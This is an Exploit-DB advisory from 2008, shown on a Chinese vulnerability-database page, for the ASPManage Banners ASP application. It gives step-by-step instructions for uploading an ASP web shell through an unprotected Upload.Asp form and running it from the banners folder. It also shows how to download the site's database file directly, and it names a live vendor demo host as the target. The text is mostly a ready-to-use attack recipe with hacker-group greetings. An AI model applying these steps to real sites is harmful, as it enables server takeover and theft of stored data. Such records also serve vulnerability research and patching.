https://www.exploit-db.com/exploits/7373
aspmanage banners - Arbitrary File Upload / File Disclosure






漏洞ID | 1057010 | 漏洞类型 | |
发布时间 | 2008-12-07 | 更新时间 | 2008-12-07 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | ASP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[~] ASPManage Banners RFU/DD Multiple Remote Vuln
[~]
[~] Demo: http://demo.merlix.com/adbanner5
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
exp: ( rfu )
http://localhost/script/banners/shell.asp
exp: ( dd )
http://localhost/script/data/DataBase.mdb
rfu: ( for demo )
you go here:
http://demo.merlix.com/adbanner5/Upload.Asp
select your shell.asp
after click to upload button
go your shell.asp
http://demo.merlix.com/adbanner5/banners/xyz.asp
dd: ( for demo )
http://demo.merlix.com/adbanner5/data/DataBase.mdb
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-12-07]
检索漏洞
开始时间
结束时间